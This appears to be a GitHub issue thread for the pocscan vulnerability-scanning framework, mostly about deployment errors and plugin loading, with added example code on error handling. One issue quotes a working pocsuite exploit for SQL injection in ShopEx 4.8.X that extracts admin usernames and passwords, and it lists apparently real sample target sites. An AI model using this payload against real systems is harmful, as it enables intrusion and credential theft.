erevus-cn / pocscan
Will to be a niubility scan-framework
[2016-07-07 16:08:27,945: WARNING/Worker-4] global name 'decode' is not defined
[2016-07-07 16:08:27,945: WARNING/Worker-4] global name 'decode' is not defined
[2016-07-07 16:08:27,946: WARNING/Worker-4] global name 'decode' is not defined
[2016-07-07 16:08:27,946: WARNING/Worker-4] global name 'decode' is not defined
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:5555 0.0.0.0:* LISTEN 13/python
tcp 0 0 0.0.0.0:8088 0.0.0.0:* LISTEN 12/python
It turns out the interactive feature is implemented with butterfly; in the previous version `docker -ti` kept failing, which was frustrating. Also, this docker image always dies on `docker restart`.
I wrote a plugin using the Bugscan framework and added it to the pocs folder, but it is never invoked during a scan. What is the problem?
Hello,
the docker source in the project is no longer valid; could you republish it?
When installing in docker mode, how do I add plugins?
pip install virtualenv
virtualenv venv
source venv/bin/activate (you will see a (venv) marker in front of the prompt)
pip install -r requirements.txt
There are two pitfalls here: first, the mysql-python package fails to install, which we can ignore (pocscan uses a sqlite database; the dependency was simply never removed); second, eventlet==0.18.1 is too old, changing it to 0.18.2 succeeds.
apt-get install rabbitmq-server
python manage.py syncdb (remember to create the user and password)
rabbitmqctl start_app
python manage.py celery worker -l info
python manage.py celery flower --broker=amqp://guest:guest@localhost:5672/ /
python manage.py runserver 0.0.0.0:8081
http://127.0.0.1:8081/
```python
try:
    for url in result.values():
        tmp = urlparse(url)
        Req_list(method="GET",
                 host=tmp.netloc,
                 uri=tmp.path,
                 url=url.encode("utf8"),
                 ua=ua,
                 cookie=cookie,
                 ).save()
except Exception as e:
    pass
return result
```
In actual testing I found that as soon as one record is a duplicate, insertion stops entirely. It would be better to handle the exception inside the loop, so that the subsequent valid records are still added.
```python
try:
    for url in result.values():
        try:
            tmp = urlparse(url)
            Req_list(method="GET",
                     host=tmp.netloc,
                     uri=tmp.path,
                     url=url.encode("utf8"),
                     ua=ua,
                     cookie=cookie,
                     ).save()
        except Exception as e:
            pass
except Exception as e:
    pass
return result
```
Don't mind the misaligned indentation.
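As an added illustration of the point made in this issue (this is editor-written example code, not pocscan's own), the two save loops below reproduce the behaviour with sqlite3 and a constructed `req_list` table whose `url` column is UNIQUE, standing in for the `Req_list` model. The constructed crawl result contains one duplicate URL; the outer-try version loses every row after the duplicate, while the per-row version skips only the duplicate.

```python
"""Per-row versus whole-loop exception handling when bulk-inserting crawl results.

Editor-added example; the table and the sample result dict are constructed
stand-ins for pocscan's Req_list model and crawler output.
"""
import sqlite3
from urllib.parse import urlparse

# Constructed crawl result in the shape the pocscan loop iterates over (a dict of URLs).
# Entry 3 repeats entry 1 and will violate the UNIQUE constraint on url.
SAMPLE_RESULT = {
    1: 'http://example.test/index.php?id=1',
    2: 'http://example.test/login.php',
    3: 'http://example.test/index.php?id=1',
    4: 'http://example.test/admin/',
}


def make_db():
    """In-memory table playing the role of Req_list; url is UNIQUE so a repeat raises."""
    conn = sqlite3.connect(':memory:')
    conn.execute(
        "CREATE TABLE req_list (method TEXT, host TEXT, uri TEXT, "
        "url TEXT UNIQUE, ua TEXT, cookie TEXT)"
    )
    return conn


def insert_row(conn, url, ua, cookie):
    """Equivalent of Req_list(...).save(): split the URL and insert one record."""
    tmp = urlparse(url)
    conn.execute(
        "INSERT INTO req_list VALUES (?, ?, ?, ?, ?, ?)",
        ('GET', tmp.netloc, tmp.path, url, ua, cookie),
    )


def count_rows(conn):
    return conn.execute("SELECT COUNT(*) FROM req_list").fetchone()[0]


def save_all_outer_try(conn, result, ua='ua', cookie=''):
    """Original shape: one try around the whole loop.

    The first duplicate raises IntegrityError, control leaves the for loop,
    and every row after the duplicate is silently lost.
    """
    try:
        for url in result.values():
            insert_row(conn, url, ua, cookie)
    except sqlite3.IntegrityError:
        pass
    conn.commit()
    return count_rows(conn)


def save_all_inner_try(conn, result, ua='ua', cookie=''):
    """Fix proposed in the issue: catch per row, so only the duplicate is skipped.

    Returns (rows_inserted, urls_skipped) so the caller can see what was dropped
    instead of swallowing the failure.
    """
    skipped = []
    for url in result.values():
        try:
            insert_row(conn, url, ua, cookie)
        except sqlite3.IntegrityError:
            skipped.append(url)
    conn.commit()
    return count_rows(conn), skipped


if __name__ == '__main__':
    print('outer try: %d rows saved' % save_all_outer_try(make_db(), SAMPLE_RESULT))
    n, skipped = save_all_inner_try(make_db(), SAMPLE_RESULT)
    print('inner try: %d rows saved, skipped %r' % (n, skipped))
```

Catching a narrow exception type (`IntegrityError`) and returning the skipped URLs is preferable to a bare `except Exception: pass`, which would also hide genuine database errors such as the "unable to open database file" failure reported elsewhere in this thread.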
With expert mode enabled, after submitting a task a popup says "Added", but the "Scanning tasks" page is empty.
Tried it with the leaked bugscan plugins and it still doesn't work...
Deployed with docker; after deployment I added bugscan plugins and later changed the plugins to 777 permissions, but they cannot be invoked. Scanning only calls the original default plugins.
2016-03-21 02:08:18,613 INFO success: syncdb entered RUNNING state, process has stayed up for > than 0 seconds (startsecs)
2016-03-21 02:08:18,614 INFO exited: celery_worker (exit status 2; not expected)
2016-03-21 02:08:18,659 INFO exited: syncdb (exit status 0; expected)
2016-03-21 02:08:18,693 INFO exited: nginx_server (exit status 0; not expected)
2016-03-21 02:08:19,695 INFO spawned: 'celery_worker' with pid 125
2016-03-21 02:08:19,695 INFO success: rabbitma_server entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2016-03-21 02:08:19,696 INFO success: uwsgi_server entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2016-03-21 02:08:19,698 INFO spawned: 'nginx_server' with pid 126
2016-03-21 02:08:19,729 INFO exited: celery_worker (exit status 2; not expected)
2016-03-21 02:08:19,745 INFO exited: nginx_server (exit status 0; not expected)
2016-03-21 02:08:22,201 INFO spawned: 'celery_worker' with pid 143
2016-03-21 02:08:22,204 INFO spawned: 'nginx_server' with pid 144
2016-03-21 02:08:22,218 INFO exited: celery_worker (exit status 2; not expected)
2016-03-21 02:08:22,223 INFO exited: nginx_server (exit status 0; not expected)
2016-03-21 02:08:25,228 INFO spawned: 'celery_worker' with pid 155
2016-03-21 02:08:25,230 INFO spawned: 'nginx_server' with pid 156
2016-03-21 02:08:25,244 INFO exited: celery_worker (exit status 2; not expected)
2016-03-21 02:08:25,248 INFO gave up: celery_worker entered FATAL state, too many start retries too quickly
2016-03-21 02:08:25,248 INFO exited: nginx_server (exit status 0; not expected)
2016-03-21 02:08:26,249 INFO gave up: nginx_server entered FATAL state, too many start retries too quickly
Then accessing it gives a 500.
docker has kernel requirements and many setups just can't run it. I downloaded and installed ubuntu locally and couldn't get it started; on the DaoCloud capsule machine it succeeded once and then never again, all 500s.
Could you provide instructions for a clean install on a VPS? ubuntu, debian or centos would all be fine.
Add CELERY_RESULT_BACKEND='djcelery.backends.database:DatabaseBackend' in settings,
otherwise the result cannot be retrieved; see https://github.com/celery/django-celery/issues/227.
What to do about the 500 error?
A question:
I updated to the latest version and ran the following on my machine:
nohup rabbitmq-server -detatched&
nohup python manage.py celery flower --broker=amqp://guest:guest@localhost:5672/ /&
python manage.py syncdb
nohup python manage.py runserver 0.0.0.0:8088&
I can log in normally and scan tasks can be added, but no scan is performed and there are no scan results...
bugscan has quite a few pocs; please support bugscan's standard poc format in the next version.
After adding a scan task there is a record in the web_tasks_status table with status=1, but the "Scanning tasks" page shows no data. What is the reason?
This time I recorded all the commands executed and their output.
Step 1: sudo curl -sSL https://get.daocloud.io/docker | sh
[sudo] evil 的密码:
Warning: the "docker" command appears to already exist on this system.
If you already have Docker installed, this script can cause trouble, which is
why we're displaying this warning and provide the opportunity to cancel the
installation.
If you installed the current Docker package using this script and are using it
again to update Docker, you can safely ignore this message.
You may press Ctrl+C now to abort this script.
Step 3:
evil@evil:$ sudo docker pull daocloud.io/aber/pocscan:latest$
latest: Pulling from aber/pocscan
87192bdbe00f: Already exists
28e09fddaacb: Already exists
7e15ce58ccb2: Already exists
a3ed95caeb02: Already exists
0d81df0148f0: Already exists
05d55b55325e: Already exists
0047f80c8c96: Already exists
45016dc7e432: Already exists
de527e69a0ad: Already exists
5f0b700d0b2a: Already exists
14da188392b5: Already exists
7ac0f3894e41: Already exists
8ce127628480: Already exists
91d710909cd4: Already exists
64110291099f: Already exists
5581a4d7d95e: Already exists
035e085848f8: Already exists
de94151bda73: Already exists
56c967f48902: Already exists
180cf3799a71: Already exists
Digest: sha256:a85ca19ba62ca9b323ba483761d4dec678a553e6a08b4965ea21e62298b8b86a
Status: Image is up to date for daocloud.io/aber/pocscan:latest
evil@evil:
Step 4:
evil@evil:$ sudo chmod -R 0777 pocscan/$
evil@evil:
Step 5:
evil@evil:~$ git clone https://github.com/erevus-cn/pocscan.git
正克隆到 'pocscan'...
remote: Counting objects: 827, done.
remote: Total 827 (delta 0), reused 0 (delta 0), pack-reused 827
接收对象中: 100% (827/827), 2.61 MiB | 181.00 KiB/s, 完成.
处理 delta 中: 100% (300/300), 完成.
检查连接... 完成。
Step 6:
evil@evil:~$ sudo docker run -d -v pocscan:/www -p 8090:8000 -p 8088:8088 daocloud.io/aber/pocscan:latest
62fea41456bfd47826fe8e4375e5661a10ba92135e841d4c462b85e3fff17f1e
Running ls:
evil@evil:$ ls pocscan/$
chtscan pocscan pocscanui requirements.txt web
manage.py pocscan.crx Readme.md screenshots
evil@evil:
Finally, opening 127.0.0.1:8090 still shows Internal Server Error. Other software runs fine in the current directory. The author said the database was not created, possibly a permissions problem; I really don't know where it went wrong.
There is nothing in the crawler; I don't know how it is used.
Do I have to download that crx to scan?
If anyone knows, please advise.
Even with plugins it doesn't scan.
Task status can't be viewed; it should be a permissions problem.
The crawler doesn't crawl?
Please advise... how is this plugin used...
I clicked save but it still doesn't show up.
Requesting detailed usage instructions.
I hope the scanner could be changed to passive scanning like bugscan, so the machine hosting the platform doesn't have to do the scanning.
Hi, when do you expect the next update of this tool? Two small issues:
1. It seems poc names can only be in English; could Chinese be supported?
2. Could the front end support uploading pocs? Currently pocs can only be added in the source code.
docker pull daocloud.io/aber/pocscan:1.1.1
1.1.1: Pulling from daocloud.io/aber/pocscan
f15ce52fc004: Pulling fs layer
c4fae638e7ce: Pulling fs layer
a4c5be5b6e59: Pulling fs layer
8693db7e8a00: Pulling fs layer
956891dc3430: Pulling fs layer
1f00d1339496: Pulling fs layer
80f7a0d545b9: Pulling fs layer
17c10ecfb12c: Pulling fs layer
fde079005cb1: Pulling fs layer
5c42e28e1339: Pulling fs layer
8fea0daa7c07: Pulling fs layer
65d414ada1a4: Pulling fs layer
4d75050ec8ba: Pulling fs layer
fc790fb60bb3: Pulling fs layer
660eb15f2c06: Pulling fs layer
e1ab3c5bb4da: Pulling fs layer
cef34003c730: Pulling fs layer
f68977bde126: Pulling fs layer
2f8afae6a03d: Pulling fs layer
d4b1da478962: Pulling fs layer
9c8506f1d290: Pulling fs layer
552994069d20: Pulling fs layer
368fa68d4aba: Pulling fs layer
ac24b6890042: Pulling fs layer
8400d0d00f83: Pulling fs layer
065d773ada26: Pulling fs layer
ec3eb6ebd9ec: Pulling fs layer
aae3298ccf61: Pulling fs layer
1d2ceab73c09: Pulling fs layer
Pulling repository daocloud.io/aber/pocscan
FATA[0008] Error: image aber/pocscan:1.1.1 not found
Tried it as soon as it came out; the crawler and sqlmap features are unsatisfactory.
First: does the crawler only crawl the home page?
Testing shows it only fetched the target url. The crawl depth is 1......
Second: is sqlmap invoked manually?
Do I select a url myself and click "To sqlmap", and only then does sqlmap test the target? Isn't that a bit cumbersome?
Thanks.
From the scan results, the bugscan pocs are not read; or are there special requirements for the file names?
The environment is OS X; I installed the OS X version, running docker in vbox.
Installed following the instructions; I can reach login and change the password, but when running scan it errors out.
As shown:
ValueError at /scan/
The view web.views.scan didn't return an HttpResponse object. It returned None instead.
Request Method: GET
Request URL: http://192.168.99.100:8888/scan/
Django Version: 1.8.3
Exception Type: ValueError
Exception Value:
The view web.views.scan didn't return an HttpResponse object. It returned None instead.
Exception Location: /usr/local/lib/python2.7/dist-packages/django/core/handlers/base.py in get_response, line 151
Python Executable: /usr/local/bin/uwsgi
Python Version: 2.7.6
Python Path:
['.',
'',
'/usr/lib/python2.7',
'/usr/lib/python2.7/plat-x86_64-linux-gnu',
'/usr/lib/python2.7/lib-tk',
'/usr/lib/python2.7/lib-old',
'/usr/lib/python2.7/lib-dynload',
'/usr/local/lib/python2.7/dist-packages',
'/usr/lib/python2.7/dist-packages',
'/www']
Server time: 星期日, 20 三月 2016 22:38:38 +0800
Not sure whether the image uploaded (https://cbu01.alicdn.com/img/ibank/2016/593/308/2853803395_1759034333.jpg)
Does this happen because there is no python in the docker environment? I have never used docker and don't understand it.
root@e2e4896826f7:/# df -h
Filesystem Size Used Avail Use% Mounted on
none 19G 18G 0 100% /
tmpfs 1001M 0 1001M 0% /dev
shm 64M 0 64M 0% /dev/shm
tmpfs 1001M 0 1001M 0% /sys/fs/cgroup
none 233G 214G 20G 92% /www
/dev/sda1 19G 18G 0 100% /etc/hosts
mac; is it because my local free space is under 20G, or is it a bug? After `run`, exec-ing into the container and running df shows 100%, and rabbitmq cannot start.
I followed the readme strictly; when starting the container with docker, this error message appeared:
2016-08-30 10:40:08,035 INFO spawned: 'nginx_server' with pid 190
2016-08-30 10:40:08,193 INFO exited: nginx_server (exit status 0; not expected)
2016-08-30 10:40:10,981 INFO spawned: 'nginx_server' with pid 292
2016-08-30 10:40:11,101 INFO exited: nginx_server (exit status 0; not expected)
2016-08-30 10:40:11,549 INFO exited: syncdb (exit status 0; expected)
2016-08-30 10:40:14,152 INFO spawned: 'nginx_server' with pid 305
2016-08-30 10:40:14,235 INFO exited: nginx_server (exit status 0; not expected)
2016-08-30 10:40:15,237 INFO gave up: nginx_server entered FATAL state, too many start retries too quickly
Despite the errors, the environment does run; not sure whether it is a configuration error. My system is ubuntu 14.04.
Googled it; not sure whether it is related to this: serverfault
Also, could the maintainers provide an installation tutorial without docker? Docker is convenient, but the plain way is more helpful for beginners like us to learn the whole deployment process; it would be a good learning opportunity.
Also, many thanks for open-sourcing this.
For example, under tangscan there is a mongodb unauthorized-access py; the scan cannot match it. Is it a problem with the py?
pocsuite poc file:
```python
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class ShopexApi(POCBase):
    vulID = '1'  # vul ID
    version = '1'
    author = 'wivd'
    vulDate = '2016-3-30'
    createDate = '2016-3-30'
    updateDate = '2016-3-30'
    references = [' ']
    name = 'ShopEx-4.8.X api.php注入漏洞 '
    appPowerLink = 'tmp'
    appName = 'ShopEx'
    appVersion = '4.8.X'
    vulType = 'SQL Injection'
    desc = '''
    ShopEx-4.8.X api.php注入漏洞
    爆用户和密码
    act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(_),concat(0x7c,(select concat(0x245E,username,0x2D3E,userpass,0x5E24) from sdb_operators limit 0,1),0x7c,floor(rand(0)_2))x from information_schema.tables group by x limit 0,1)a)#
    爆数据版本
    act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(_),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)_2))x from information_schema.tables group by x limit 0,1)a)#
    爆数据库
    act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(_),concat(0x7c,(select (Select database()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)_2))x from information_schema.tables group by x limit 0,1)a)#
    爆数据库用户
    act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(_),concat(0x7c,(select (Select user()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)_2))x from information_schema.tables group by x limit 0,1)a)#
    '''
    samples = ['http://dmdpower.cn', 'http://eb166.com']

    def _attack(self):
        return self._verify()

    def _verify(self, verify=True):
        result = {}
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        }
        vul_url = self.url + "/api.php"
        payload = "act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x23,(select concat(username,0x23,userpass) from sdb_operators limit 0,1),0x23,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#"
        response = req.post(vul_url, data=payload, headers=headers)
        content = response.content
        # The error message is split on '#' to pick out the second and third fields
        data = re.search(r"(Duplicate entry.*)\#(.*)\#(.*)\#(.*)", content)
        if response.status_code == 200 and data is not None:
            result = {'VerifyInfo': {}, 'AdminInfo': {}}
            result['VerifyInfo']['URL'] = self.url
            result['AdminInfo']['Username'] = data.group(2)
            result['AdminInfo']['Password'] = data.group(3)
            result['VerifyInfo']['data'] = data.group()
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(ShopexApi)
```
The pocsuite module runs and detects the vulnerability. But when bugscan invokes this poc there is a problem: after execution no vulnerability is detected and the results are empty. Looking at the logs, bugscan uses the class name TestPOC uniformly when it calls pocsuite. After changing the script above from class ShopexApi(POCBase): ====> class TestPOC(POCBase): and register(ShopexApi) ===> register(TestPOC), it runs correctly. In pocsuite scripts the class name varies from author to author, so I suggest improving how pocsuite class names are handled.
After the POC scan finishes, how do I view the vulnerable ones? I picked a random vulnerable dede and nothing was found. How do I set the API address? Could the author write a detailed tutorial?
I have never installed this kind of environment and don't quite understand; could the author give some pointers, first install xx, then install xx?
bugscan compatibility still doesn't seem great; unmodified bugscan plugins find nothing, as if they weren't used at all... but when I rewrite them as pocsuite pocs, they do find things.
OperationalError at /login/
unable to open database file
Request Method: POST
Request URL: http://192.168.2.114:8090/login/
Django Version: 1.8.3
Exception Type: OperationalError
Exception Value:
unable to open database file
Exception Location: /usr/local/lib/python2.7/dist-packages/django/db/backends/sqlite3/base.py in get_new_connection, line 204
Python Executable: /usr/local/bin/uwsgi
Python Version: 2.7.6
Python Path:
['.',
'',
'/usr/lib/python2.7',
'/usr/lib/python2.7/plat-x86_64-linux-gnu',
'/usr/lib/python2.7/lib-tk',
'/usr/lib/python2.7/lib-old',
'/usr/lib/python2.7/lib-dynload',
'/usr/local/lib/python2.7/dist-packages',
'/usr/lib/python2.7/dist-packages']
If a poc imports a new module it raises an ImportError; is there a better way to solve this?
`docker pull daocloud.io/aber/pocscan:latest`: where is the default directory?
How should the absolute path of the directory be written?
Does this framework support batch scanning of IP ranges?
Fresh ubuntu environment.
Following the setup steps gives an error:
Internal Server Error
The directory given the permissions is the folder extracted from the download link provided above.
What is the problem?
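Two of the issues above, the report that bugscan only finds a pocsuite poc when its class is named TestPOC, and the question about a poc whose import raises ImportError, both come down to how the plugin directory is loaded. The loader below is an editor-added example (not pocscan's or pocsuite's own code) showing one way a framework can handle both: it discovers the POCBase subclass in each file by introspection instead of by a fixed class name, and it records an ImportError per file instead of letting one broken plugin abort the whole load. `POCBase` here is a minimal stand-in registered under a constructed module name `pocbase_stub`, and the three sample poc files are constructed for the demonstration.

```python
"""Editor-added example: discover the POCBase subclass in each poc file by
introspection and isolate ImportError per file.

Assumptions: POCBase is a stand-in for pocsuite.poc.POCBase (only the
inheritance relation matters here); the sample poc sources are constructed.
"""
import importlib.util
import inspect
import os
import sys
import tempfile
import types


class POCBase(object):
    """Stand-in base class; real pocs inherit from pocsuite.poc.POCBase."""
    name = ''


# Expose the stand-in under a constructed module name so the sample files can import it.
_stub = types.ModuleType('pocbase_stub')
_stub.POCBase = POCBase
sys.modules['pocbase_stub'] = _stub

# Constructed sample poc files: the author-chosen class name differs per file,
# and one file imports a module that is not installed.
SAMPLE_POCS = {
    'shopex_api.py': (
        "from pocbase_stub import POCBase\n"
        "class ShopexApi(POCBase):\n"
        "    name = 'author-named poc'\n"
    ),
    'std_named.py': (
        "from pocbase_stub import POCBase\n"
        "class TestPOC(POCBase):\n"
        "    name = 'conventionally named poc'\n"
    ),
    'needs_missing_dep.py': (
        "import module_that_is_not_installed_xyz\n"
        "from pocbase_stub import POCBase\n"
        "class Whatever(POCBase):\n"
        "    name = 'never loads'\n"
    ),
}


def write_samples(directory):
    for fname, src in SAMPLE_POCS.items():
        with open(os.path.join(directory, fname), 'w') as fh:
            fh.write(src)


def find_poc_class(module):
    """Return the class defined in `module` that subclasses POCBase, or None.

    Matching on inheritance rather than on the name 'TestPOC' means a poc
    written as class ShopexApi(POCBase) is found without renaming.
    """
    for _, obj in inspect.getmembers(module, inspect.isclass):
        if (issubclass(obj, POCBase) and obj is not POCBase
                and obj.__module__ == module.__name__):
            return obj
    return None


def load_poc_file(path):
    """Load one poc file; returns (poc_class_or_None, error_string_or_None)."""
    mod_name = 'poc_' + os.path.splitext(os.path.basename(path))[0]
    spec = importlib.util.spec_from_file_location(mod_name, path)
    module = importlib.util.module_from_spec(spec)
    try:
        spec.loader.exec_module(module)
    except ImportError as exc:
        # A missing dependency disables this poc only; the others still load.
        return None, 'ImportError: %s' % exc
    cls = find_poc_class(module)
    if cls is None:
        return None, 'no POCBase subclass found'
    return cls, None


def load_poc_dir(directory):
    """Map each .py file to the name of its poc class, or to its load error."""
    report = {}
    for fname in sorted(os.listdir(directory)):
        if not fname.endswith('.py'):
            continue
        cls, err = load_poc_file(os.path.join(directory, fname))
        report[fname] = cls.__name__ if cls else err
    return report


def demo():
    with tempfile.TemporaryDirectory() as d:
        write_samples(d)
        return load_poc_dir(d)


if __name__ == '__main__':
    for fname, status in demo().items():
        print('%-22s %s' % (fname, status))
```

The per-file report is what an operator needs to see in the scan log: a poc that silently fails to load looks exactly like "the plugin is not invoked", which is the symptom several of the reports in this thread describe.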